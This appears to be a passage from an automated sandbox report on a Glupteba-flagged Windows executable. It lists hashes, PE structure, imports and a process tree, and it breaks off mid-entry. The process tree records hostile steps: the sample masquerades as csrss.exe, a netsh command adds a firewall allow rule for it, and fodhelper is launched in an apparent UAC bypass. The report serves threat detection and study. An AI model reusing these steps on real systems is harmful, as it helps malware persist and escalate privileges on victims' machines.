                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Windows\rss\csrss.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\kdsyitkxmS.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4379008
                                                          Entropy (8bit):7.97472217525508
                                                          Encrypted:false
                                                          SSDEEP:98304:/RKU80KHe0iz3Dt6Ds6DV8G66EjKN69i5SvbFOqRrLfO2FnC86:/4e0i7Dt6XDGG/EjKN6LjxdFnC86
                                                          MD5:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          SHA1:45748A6D6474F470D44E848596E0E08BCE674996
                                                          SHA-256:626DF082C2624D9530794881921094AA100FA0A805B1544112D5A07DBE12CBC2
                                                          SHA-512:E1537B4EBF7DD9CF345B0F8C0646DE1DF1152469151B43CC8C08370EB3C40393940598DE98A11E47C9810D891942F385F7C6CB9AD4470A3C8941961B2A98247B
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 32%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...................PE..L.....a..................@..J&.....YN........@...@.................................5TC.....................................(.@.d....0e...............B......P...... ...............................P1..@............................................text....@.......@................. ..`.data...DX$...@.......@.............@....rsrc.....,..0e.......@.............@..@.reloc...Z...P...\...jB.............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                          \Device\Null

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):558
                                                          Entropy (8bit):4.895006803896944
                                                          Encrypted:false
                                                          SSDEEP:12:AXvkJFNqVIVhIe6NqVv16FNqVlU+N0uaHN1J+ykGm3E:AfE8ahIe68vo8O+eN7ZmU
                                                          MD5:C93D96A170E6D822681EA6A8BFC5998D
                                                          SHA1:2E482AFD90555685A7518C11276203602213493C
                                                          SHA-256:E212E2C01B7181D6BAE0BBC2E8D1B0375670F1D38CB3EC95F1DB640328FB2710
                                                          SHA-512:8A24FD7CF5041DC662FF6BB94FE1E522449E6514A95E6D933713208501E0FDF70BC54A766F52F3490AF2FB8F221448E42B4BCAB5D332F4AAE8C51B2B7C8A896E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:MAIN : 2023/05/28 11:34:17 main.go:129: INFO opera-proxy client version v1.2.2 is starting....MAIN : 2023/05/28 11:34:18 main.go:284: INFO Endpoint: 77.111.247.137:443.MAIN : 2023/05/28 11:34:18 main.go:285: INFO Starting proxy server....MAIN : 2023/05/28 11:34:18 main.go:287: INFO Init complete..PROXY : 2023/05/28 11:34:18 handler.go:92: INFO Request: 127.0.0.1:50012 HTTP/1.0 CONNECT //77.68.94.106:9001.PROXY : 2023/05/28 11:34:27 handler.go:92: INFO Request: 127.0.0.1:50014 HTTP/1.0 CONNECT //161.97.67.106:443.

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.97472217525508
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:kdsyitkxmS.exe
                                                          File size:4379008
                                                          MD5:01fe6ba28d82175d35665b3eb6ed8cea
                                                          SHA1:45748a6d6474f470d44e848596e0e08bce674996
                                                          SHA256:626df082c2624d9530794881921094aa100fa0a805b1544112d5a07dbe12cbc2
                                                          SHA512:e1537b4ebf7dd9cf345b0f8c0646de1df1152469151b43cc8c08370eb3c40393940598de98a11e47c9810d891942f385f7c6cb9ad4470a3c8941961b2a98247b
                                                          SSDEEP:98304:/RKU80KHe0iz3Dt6Ds6DV8G66EjKN69i5SvbFOqRrLfO2FnC86:/4e0i7Dt6XDGG/EjKN6LjxdFnC86
                                                          TLSH:BB162313A3A1BD54E9564BB39F2F92F8776EB6708F143755311DBA1B08B02B2C263B11
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.......|...c...|...c...|...c...Richb...................PE..L......a...........

                                                          File Icon

                                                          Icon Hash:454549495545611d

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x404e59
                                                          Entrypoint Section:.text
                                                          Digitally signed:true
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x61AADEB8 [Sat Dec 4 03:21:28 2021 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:0
                                                          File Version Major:5
                                                          File Version Minor:0
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:0
                                                          Import Hash:2d9ed3462f8a74bfd1231e2e9de56b43

                                                          Authenticode Signature

                                                          Signature Valid:false
                                                          Signature Issuer:CN=522a29533d3f200e2d1728300c141021081631313626321023042b113f2d26353224, PostalCode=10802, S=0b1c1115005f5c4e11160b0a090100180d1c4f170217 + S=0b1c1115494a5c17161151151d135100034653465007170e1c520b071c040f0f5216050f1244171f0b110e04061211081e0347124308570a1e0c0b19560a055b0c0b0a070b
                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                          Error Number:-2146762487
                                                          Not Before, Not After
                                                          • 28/05/2023 09:13:44 27/05/2024 09:13:44
                                                          Subject Chain
                                                          • CN=522a29533d3f200e2d1728300c141021081631313626321023042b113f2d26353224, PostalCode=10802, S=0b1c1115005f5c4e11160b0a090100180d1c4f170217 + S=0b1c1115494a5c17161151151d135100034653465007170e1c520b071c040f0f5216050f1244171f0b110e04061211081e0347124308570a1e0c0b19560a055b0c0b0a070b
                                                          Version:3
                                                          Thumbprint MD5:FA499CD6C5F7A74F5A748B778F305AE3
                                                          Thumbprint SHA-1:FF3C70A0D6A66705568453AA262257D22183BCA7
                                                          Thumbprint SHA-256:F96E2C83FF581F02D48E26B51B960B61592EE9B397B86A2A3A604587ABC9D0B4
                                                          Serial:10F68FF5E99D28F7644E5B17DA75165E

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007F0631074B13h
                                                          jmp 00007F06310701ADh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          mov ecx, dword ptr [esp+04h]
                                                          test ecx, 00000003h
                                                          je 00007F0631070356h
                                                          mov al, byte ptr [ecx]
                                                          add ecx, 01h
                                                          test al, al
                                                          je 00007F0631070380h
                                                          test ecx, 00000003h
                                                          jne 00007F0631070321h
                                                          add eax, 00000000h
                                                          lea esp, dword ptr [esp+00000000h]
                                                          lea esp, dword ptr [esp+00000000h]
                                                          mov eax, dword ptr [ecx]
                                                          mov edx, 7EFEFEFFh
                                                          add edx, eax
                                                          xor eax, FFFFFFFFh
                                                          xor eax, edx
                                                          add ecx, 04h
                                                          test eax, 81010100h
                                                          je 00007F063107031Ah
                                                          mov eax, dword ptr [ecx-04h]
                                                          test al, al
                                                          je 00007F0631070364h
                                                          test ah, ah
                                                          je 00007F0631070356h
                                                          test eax, 00FF0000h
                                                          je 00007F0631070345h
                                                          test eax, FF000000h
                                                          je 00007F0631070334h
                                                          jmp 00007F06310702FFh
                                                          lea eax, dword ptr [ecx-01h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          lea eax, dword ptr [ecx-02h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          lea eax, dword ptr [ecx-03h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          lea eax, dword ptr [ecx-04h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          mov edi, edi
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 20h
                                                          mov eax, dword ptr [ebp+08h]
                                                          push esi
                                                          push edi
                                                          push 00000008h
                                                          pop ecx
                                                          mov esi, 004012D8h
                                                          lea edi, dword ptr [ebp-20h]
                                                          rep movsd
                                                          mov dword ptr [ebp-08h], eax
                                                          mov eax, dword ptr [ebp+0Ch]
                                                          pop edi
                                                          mov dword ptr [ebp-04h], eax
                                                          pop esi

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ASM] VS2008 build 21022
                                                          • [ C ] VS2008 build 21022
                                                          • [C++] VS2008 build 21022
                                                          • [IMP] VS2005 build 50727
                                                          • [RES] VS2008 build 21022
                                                          • [LNK] VS2008 build 21022

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x40b8280x64.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x6530000x19398.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x42c6000xb80.data
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x9150000xddc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x12200x1c.text
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x31500x40.text
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d4.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x40b2ea0x40b400unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .data0x40d0000x2458440x1e00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x6530000x2c13980x19400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x9150000x5a160x5c00False0.12958559782608695data1.558620115158612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_ICON0x6537300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
                                                          RT_ICON0x6545d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                                                          RT_ICON0x654e800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
                                                          RT_ICON0x6574280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                                                          RT_ICON0x6584d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
                                                          RT_ICON0x6589880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
                                                          RT_ICON0x6598300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                                                          RT_ICON0x65a0d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0
                                                          RT_ICON0x65a6400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
                                                          RT_ICON0x65cbe80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                                                          RT_ICON0x65dc900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0
                                                          RT_ICON0x65e6180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
                                                          RT_ICON0x65eae80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
                                                          RT_ICON0x65f9900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                                                          RT_ICON0x6602380x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0
                                                          RT_ICON0x6609000x568Device independent bitmap graphic, 16 x 32 x 8, image size 0
                                                          RT_ICON0x660e680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
                                                          RT_ICON0x6634100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                                                          RT_ICON0x6644b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
                                                          RT_ICON0x6649880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
                                                          RT_ICON0x6658300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                                                          RT_ICON0x6660d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0
                                                          RT_ICON0x6666400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
                                                          RT_ICON0x668be80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                                                          RT_ICON0x669c900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0
                                                          RT_ICON0x66a6180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
                                                          RT_STRING0x66ad200x664data
                                                          RT_STRING0x66b3880x59edata
                                                          RT_STRING0x66b9280x29adata
                                                          RT_STRING0x66bbc80x248data
                                                          RT_STRING0x66be100x582data
                                                          RT_GROUP_ICON0x66aa800x68data
                                                          RT_GROUP_ICON0x6589380x4cdata
                                                          RT_GROUP_ICON0x6649200x68data
                                                          RT_GROUP_ICON0x65ea800x68data
                                                          RT_VERSION0x66aae80x238data

                                                          Imports

                                                          DLLImport
                                                          KERNEL32.dllGetModuleHandleW, IsBadReadPtr, GetConsoleAliasesLengthA, WaitForMultipleObjectsEx, GetPrivateProfileIntA, FreeConsole, GetVersionExW, WritePrivateProfileStructW, MulDiv, GetModuleFileNameW, CreateActCtxA, WritePrivateProfileStringW, ReplaceFileA, GetStringTypeExA, GetStdHandle, GetLogicalDriveStringsA, OpenMutexW, GetLastError, ReadConsoleOutputCharacterA, GetProcAddress, AttachConsole, SleepEx, VirtualAlloc, _hwrite, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, GetFileType, CreateFileMappingW, FindFirstVolumeMountPointW, GetNumberFormatW, CreateEventW, GetModuleFileNameA, lstrcmpiW, GetModuleHandleA, CreateMutexA, GetFileAttributesExW, GetConsoleCursorInfo, ScrollConsoleScreenBufferA, GetCurrentThreadId, FindAtomW, EnumResourceLanguagesW, DebugBreak, FindNextVolumeA, AddConsoleAliasW, CancelWaitableTimer, GetCommState, WaitForSingleObject, GetLongPathNameA, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapFree, WideCharToMultiByte, SetHandleCount, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, Sleep, ExitProcess, WriteFile, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, HeapSize, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, CreateFileA, CloseHandle
                                                          USER32.dllCharLowerBuffA
                                                          GDI32.dllGetCharWidthW, EnumFontsW, GetCharABCWidthsFloatW
                                                          ADVAPI32.dllMapGenericMask

                                                          Network Behavior

                                                          Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:11:30:14
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                          Imagebase:0x7ff769ed0000
                                                          File size:57360 bytes
                                                          MD5 hash:F586835082F632DC8D9404D83BC16316
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Target ID:4
                                                          Start time:11:30:15
                                                          Start date:28/05/2023
                                                          Path:C:\Users\user\Desktop\kdsyitkxmS.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\kdsyitkxmS.exe
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          General

                                                          Target ID:6
                                                          Start time:11:30:18
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          General

                                                          Target ID:7
                                                          Start time:11:30:18
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:9
                                                          Start time:11:30:29
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\servicing\TrustedInstaller.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\servicing\TrustedInstaller.exe
                                                          Imagebase:0x7ff795940000
                                                          File size:156488 bytes
                                                          MD5 hash:F14D860CAE05DBD10671623C76B5DE65
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low

                                                          General

                                                          Target ID:10
                                                          Start time:11:30:29
                                                          Start date:28/05/2023
                                                          Path:C:\Users\user\Desktop\kdsyitkxmS.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\kdsyitkxmS.exe
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          Reputation:low

                                                          General

                                                          Target ID:11
                                                          Start time:11:30:31
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          General

                                                          Target ID:12
                                                          Start time:11:30:31
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:13
                                                          Start time:11:30:42
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                          Imagebase:0x7ff7d3a70000
                                                          File size:289792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:14
                                                          Start time:11:30:42
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:15
                                                          Start time:11:30:42
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\netsh.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                          Imagebase:0x7ff7bcfe0000
                                                          File size:96768 bytes
                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:16
                                                          Start time:11:30:42
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Target ID:17
                                                          Start time:11:30:42
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:18
                                                          Start time:11:30:53
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Target ID:19
                                                          Start time:11:30:53
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:20
                                                          Start time:11:31:04
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\rss\csrss.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\rss\csrss.exe
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 32%, ReversingLabs

                                                          General

                                                          Target ID:21
                                                          Start time:11:31:06
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Target ID:22
                                                          Start time:11:31:06
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:23
                                                          Start time:11:31:13
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\rss\csrss.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\rss\csrss.exe"
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

                                                          General

                                                          Target ID:24
                                                          Start time:11:31:15
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Sysnative\cmd.exe /C fodhelper
                                                          Imagebase:0x7ff7d3a70000
                                                          File size:289792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:25
                                                          Start time:11:31:15
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:26
                                                          Start time:11:31:15
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\fodhelper.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:fodhelper
                                                          Imagebase:0x7ff697a80000
                                                          File size:49664 bytes
                                                          MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                          Has elevated privileges:false
